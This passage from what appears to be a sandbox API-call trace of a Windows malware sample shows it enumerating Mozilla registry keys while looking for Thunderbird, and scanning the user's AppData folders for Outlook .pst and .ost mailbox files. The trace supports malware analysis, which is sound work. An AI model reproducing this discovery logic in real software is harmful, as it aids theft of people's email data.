(hMem=0xd19c110) returned 0x0 [0251.998] LocalFree (hMem=0xd2156a0) returned 0x0 [0251.998] RegEnumKeyExW (in: hKey=0x944, dwIndex=0x1, lpName=0xd19b080, lpcchName=0x1c4f708, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x1c4f708, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0251.998] RegCloseKey (hKey=0x944) returned 0x0 [0251.999] LocalFree (hMem=0xd19b080) returned 0x0 [0251.999] LocalFree (hMem=0xd2180b0) returned 0x0 [0251.999] RegEnumKeyExW (in: hKey=0xb48, dwIndex=0x1, lpName=0xd212550, lpcchName=0x1c4f768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox", lpcchName=0x1c4f768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0251.999] lstrlenW (lpString="Software\\Mozilla") returned 16 [0251.999] lstrlenW (lpString="\\") returned 1 [0251.999] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0xd1d0180 [0251.999] lstrcpyW (in: lpString1=0xd1d0180, lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0251.999] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0251.999] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0251.999] lstrlenW (lpString="Mozilla Firefox") returned 15 [0251.999] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215b80 [0251.999] lstrcpyW (in: lpString1=0xd215b80, lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0251.999] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Mozilla Firefox" | out: lpString1="Software\\Mozilla\\Mozilla Firefox") returned="Software\\Mozilla\\Mozilla Firefox" [0251.999] LocalFree (hMem=0xd1d0180) returned 0x0 [0251.999] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox", lpSrch="Thunderbird") returned 0x0 [0251.999] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd19b080 [0251.999] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f718 | out: phkResult=0x1c4f718*=0x944) returned 0x0 [0251.999] RegEnumKeyExW (in: hKey=0x944, dwIndex=0x0, lpName=0xd19b080, lpcchName=0x1c4f708, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="53.0.3 (x86 en-GB)", lpcchName=0x1c4f708, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0251.999] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox") returned 32 [0251.999] lstrlenW (lpString="\\") returned 1 [0251.999] LocalAlloc (uFlags=0x40, uBytes=0xc4) returned 0xd2156a0 [0251.999] lstrcpyW (in: lpString1=0xd2156a0, lpString2="Software\\Mozilla\\Mozilla Firefox" | out: lpString1="Software\\Mozilla\\Mozilla Firefox") returned="Software\\Mozilla\\Mozilla Firefox" [0251.999] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\") returned="Software\\Mozilla\\Mozilla Firefox\\" [0251.999] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\") returned 33 [0251.999] lstrlenW (lpString="53.0.3 (x86 en-GB)") returned 18 [0251.999] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0xd19abf0 [0251.999] lstrcpyW (in: lpString1=0xd19abf0, lpString2="Software\\Mozilla\\Mozilla Firefox\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\") returned="Software\\Mozilla\\Mozilla Firefox\\" [0251.999] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\", lpString2="53.0.3 (x86 en-GB)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)" [0251.999] LocalFree (hMem=0xd2156a0) returned 0x0 [0251.999] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)", lpSrch="Thunderbird") returned 0x0 [0251.999] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd19c110 [0251.999] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f6b8 | out: phkResult=0x1c4f6b8*=0x9f8) returned 0x0 [0252.000] RegEnumKeyExW (in: hKey=0x9f8, dwIndex=0x0, lpName=0xd19c110, lpcchName=0x1c4f6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Main", lpcchName=0x1c4f6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0252.000] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)") returned 51 [0252.000] lstrlenW (lpString="\\") returned 1 [0252.000] LocalAlloc (uFlags=0x40, uBytes=0xea) returned 0x5d38410 [0252.000] lstrcpyW (in: lpString1=0x5d38410, lpString2="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)" [0252.000] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\" [0252.000] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\") returned 52 [0252.000] lstrlenW (lpString="Main") returned 4 [0252.000] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d39410 [0252.000] lstrcpyW (in: lpString1=0x5d39410, lpString2="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\" [0252.000] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\", lpString2="Main" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Main") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Main" [0252.000] LocalFree (hMem=0x5d38410) returned 0x0 [0252.000] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Main", lpSrch="Thunderbird") returned 0x0 [0252.000] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5bb11c0 [0252.000] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Main", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f658 | out: phkResult=0x1c4f658*=0xa80) returned 0x0 [0252.000] RegEnumKeyExW (in: hKey=0xa80, dwIndex=0x0, lpName=0x5bb11c0, lpcchName=0x1c4f648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4f648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.000] RegCloseKey (hKey=0xa80) returned 0x0 [0252.000] LocalFree (hMem=0x5bb11c0) returned 0x0 [0252.000] LocalFree (hMem=0x5d39410) returned 0x0 [0252.000] RegEnumKeyExW (in: hKey=0x9f8, dwIndex=0x1, lpName=0xd19c110, lpcchName=0x1c4f6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x1c4f6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0252.000] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)") returned 51 [0252.000] lstrlenW (lpString="\\") returned 1 [0252.000] LocalAlloc (uFlags=0x40, uBytes=0xea) returned 0x5d39b10 [0252.000] lstrcpyW (in: lpString1=0x5d39b10, lpString2="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)" [0252.000] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\" [0252.000] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\") returned 52 [0252.000] lstrlenW (lpString="Uninstall") returned 9 [0252.000] LocalAlloc (uFlags=0x40, uBytes=0xfc) returned 0xd204340 [0252.000] lstrcpyW (in: lpString1=0xd204340, lpString2="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\" [0252.000] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\", lpString2="Uninstall" | out: lpString1="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Uninstall") returned="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Uninstall" [0252.001] LocalFree (hMem=0x5d39b10) returned 0x0 [0252.001] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Uninstall", lpSrch="Thunderbird") returned 0x0 [0252.001] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5bb11c0 [0252.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\53.0.3 (x86 en-GB)\\Uninstall", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f658 | out: phkResult=0x1c4f658*=0xa80) returned 0x0 [0252.001] RegEnumKeyExW (in: hKey=0xa80, dwIndex=0x0, lpName=0x5bb11c0, lpcchName=0x1c4f648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4f648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.001] RegCloseKey (hKey=0xa80) returned 0x0 [0252.001] LocalFree (hMem=0x5bb11c0) returned 0x0 [0252.001] LocalFree (hMem=0xd204340) returned 0x0 [0252.001] RegEnumKeyExW (in: hKey=0x9f8, dwIndex=0x2, lpName=0xd19c110, lpcchName=0x1c4f6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x1c4f6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.001] RegCloseKey (hKey=0x9f8) returned 0x0 [0252.001] LocalFree (hMem=0xd19c110) returned 0x0 [0252.001] LocalFree (hMem=0xd19abf0) returned 0x0 [0252.001] RegEnumKeyExW (in: hKey=0x944, dwIndex=0x1, lpName=0xd19b080, lpcchName=0x1c4f708, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="53.0.3 (x86 en-GB)", lpcchName=0x1c4f708, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.001] RegCloseKey (hKey=0x944) returned 0x0 [0252.001] LocalFree (hMem=0xd19b080) returned 0x0 [0252.001] LocalFree (hMem=0xd215b80) returned 0x0 [0252.001] RegEnumKeyExW (in: hKey=0xb48, dwIndex=0x2, lpName=0xd212550, lpcchName=0x1c4f768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 53.0.3", lpcchName=0x1c4f768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0252.001] lstrlenW (lpString="Software\\Mozilla") returned 16 [0252.001] lstrlenW (lpString="\\") returned 1 [0252.001] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0xd1d0180 [0252.001] lstrcpyW (in: lpString1=0xd1d0180, lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0252.001] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0252.001] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0252.001] lstrlenW (lpString="Mozilla Firefox 53.0.3") returned 22 [0252.001] LocalAlloc (uFlags=0x40, uBytes=0xd0) returned 0x40fdc0 [0252.001] lstrcpyW (in: lpString1=0x40fdc0, lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0252.001] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Mozilla Firefox 53.0.3" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3" [0252.001] LocalFree (hMem=0xd1d0180) returned 0x0 [0252.001] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 53.0.3", lpSrch="Thunderbird") returned 0x0 [0252.001] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd19b080 [0252.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 53.0.3", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f718 | out: phkResult=0x1c4f718*=0x944) returned 0x0 [0252.002] RegEnumKeyExW (in: hKey=0x944, dwIndex=0x0, lpName=0xd19b080, lpcchName=0x1c4f708, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bin", lpcchName=0x1c4f708, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0252.002] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 53.0.3") returned 39 [0252.002] lstrlenW (lpString="\\") returned 1 [0252.002] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x40f340 [0252.002] lstrcpyW (in: lpString1=0x40f340, lpString2="Software\\Mozilla\\Mozilla Firefox 53.0.3" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3" [0252.002] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3\\" [0252.002] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 53.0.3\\") returned 40 [0252.002] lstrlenW (lpString="bin") returned 3 [0252.002] LocalAlloc (uFlags=0x40, uBytes=0xd8) returned 0x40f5e0 [0252.002] lstrcpyW (in: lpString1=0x40f5e0, lpString2="Software\\Mozilla\\Mozilla Firefox 53.0.3\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3\\" [0252.002] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\", lpString2="bin" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\bin") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3\\bin" [0252.002] LocalFree (hMem=0x40f340) returned 0x0 [0252.002] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 53.0.3\\bin", lpSrch="Thunderbird") returned 0x0 [0252.002] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd19c110 [0252.002] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 53.0.3\\bin", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f6b8 | out: phkResult=0x1c4f6b8*=0x9f8) returned 0x0 [0252.002] RegEnumKeyExW (in: hKey=0x9f8, dwIndex=0x0, lpName=0xd19c110, lpcchName=0x1c4f6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4f6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.002] RegCloseKey (hKey=0x9f8) returned 0x0 [0252.002] LocalFree (hMem=0xd19c110) returned 0x0 [0252.002] LocalFree (hMem=0x40f5e0) returned 0x0 [0252.002] RegEnumKeyExW (in: hKey=0x944, dwIndex=0x1, lpName=0xd19b080, lpcchName=0x1c4f708, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x1c4f708, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0252.002] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 53.0.3") returned 39 [0252.002] lstrlenW (lpString="\\") returned 1 [0252.002] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x40f340 [0252.002] lstrcpyW (in: lpString1=0x40f340, lpString2="Software\\Mozilla\\Mozilla Firefox 53.0.3" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3" [0252.002] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3\\" [0252.002] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 53.0.3\\") returned 40 [0252.002] lstrlenW (lpString="extensions") returned 10 [0252.002] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0xd199840 [0252.002] lstrcpyW (in: lpString1=0xd199840, lpString2="Software\\Mozilla\\Mozilla Firefox 53.0.3\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3\\" [0252.002] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\", lpString2="extensions" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 53.0.3\\extensions") returned="Software\\Mozilla\\Mozilla Firefox 53.0.3\\extensions" [0252.003] LocalFree (hMem=0x40f340) returned 0x0 [0252.003] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 53.0.3\\extensions", lpSrch="Thunderbird") returned 0x0 [0252.003] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0xd19c110 [0252.003] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 53.0.3\\extensions", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f6b8 | out: phkResult=0x1c4f6b8*=0x9f8) returned 0x0 [0252.003] RegEnumKeyExW (in: hKey=0x9f8, dwIndex=0x0, lpName=0xd19c110, lpcchName=0x1c4f6a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4f6a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.003] RegCloseKey (hKey=0x9f8) returned 0x0 [0252.003] LocalFree (hMem=0xd19c110) returned 0x0 [0252.003] LocalFree (hMem=0xd199840) returned 0x0 [0252.003] RegEnumKeyExW (in: hKey=0x944, dwIndex=0x2, lpName=0xd19b080, lpcchName=0x1c4f708, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x1c4f708, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.003] RegCloseKey (hKey=0x944) returned 0x0 [0252.003] LocalFree (hMem=0xd19b080) returned 0x0 [0252.003] LocalFree (hMem=0x40fdc0) returned 0x0 [0252.003] RegEnumKeyExW (in: hKey=0xb48, dwIndex=0x3, lpName=0xd212550, lpcchName=0x1c4f768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 53.0.3", lpcchName=0x1c4f768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0252.003] RegCloseKey (hKey=0xb48) returned 0x0 [0252.003] LocalFree (hMem=0xd212550) returned 0x0 [0252.003] IUnknown:Release (This=0xd1ee010) returned 0x0 [0252.003] CoUninitialize () Thread: id = 105 os_tid = 0x794 [0249.243] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0249.243] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x235f7d0 | out: ppstm=0x235f7d0*=0xd1ee050) returned 0x0 [0249.243] IStream:RemoteSeek (in: This=0xd1ee050, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0249.243] IStream:SetSize (This=0xd1ee050, libNewSize=0x0) returned 0x0 [0249.243] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x7ff975900000 [0249.244] GetProcAddress (hModule=0x7ff975900000, lpProcName="SHGetFolderPathW") returned 0x7ff9759e0080 [0249.244] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x235f490 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x0 [0249.245] GetProcAddress (hModule=0x7ff977360000, lpProcName="PathCombineW") returned 0x7ff97736d130 [0249.245] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*" [0249.245] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\*", lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 0x5d03470 [0249.245] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.245] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.246] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.246] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.246] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.247] GetProcAddress (hModule=0x7ff977360000, lpProcName="PathMatchSpecW") returned 0x7ff977374990 [0249.247] PathMatchSpecW (pszFile="1CHzw2Rx2S_zW_tQ.mkv", pszSpec="*.pst") returned 0 [0249.247] PathMatchSpecW (pszFile="1CHzw2Rx2S_zW_tQ.mkv", pszSpec="*.ost") returned 0 [0249.247] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.247] PathMatchSpecW (pszFile="1o2T0sbYBt _ogxAgQ.ods", pszSpec="*.pst") returned 0 [0249.247] PathMatchSpecW (pszFile="1o2T0sbYBt _ogxAgQ.ods", pszSpec="*.ost") returned 0 [0249.247] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.247] PathMatchSpecW (pszFile="3OJxxNMW9VSj345koant.jpg", pszSpec="*.pst") returned 0 [0249.247] PathMatchSpecW (pszFile="3OJxxNMW9VSj345koant.jpg", pszSpec="*.ost") returned 0 [0249.247] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.247] PathMatchSpecW (pszFile="4xHiScMFN.bmp", pszSpec="*.pst") returned 0 [0249.247] PathMatchSpecW (pszFile="4xHiScMFN.bmp", pszSpec="*.ost") returned 0 [0249.247] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.247] PathMatchSpecW (pszFile="aArNAcQ.mkv", pszSpec="*.pst") returned 0 [0249.247] PathMatchSpecW (pszFile="aArNAcQ.mkv", pszSpec="*.ost") returned 0 [0249.247] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.247] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe" [0249.248] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*" [0249.248] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5d031d0 [0249.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.249] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.249] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.249] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat" [0249.249] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0249.249] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d036b0 [0249.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.250] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.250] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.250] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="DC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC" [0249.250] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*" [0249.250] FindFirstFileW (in: 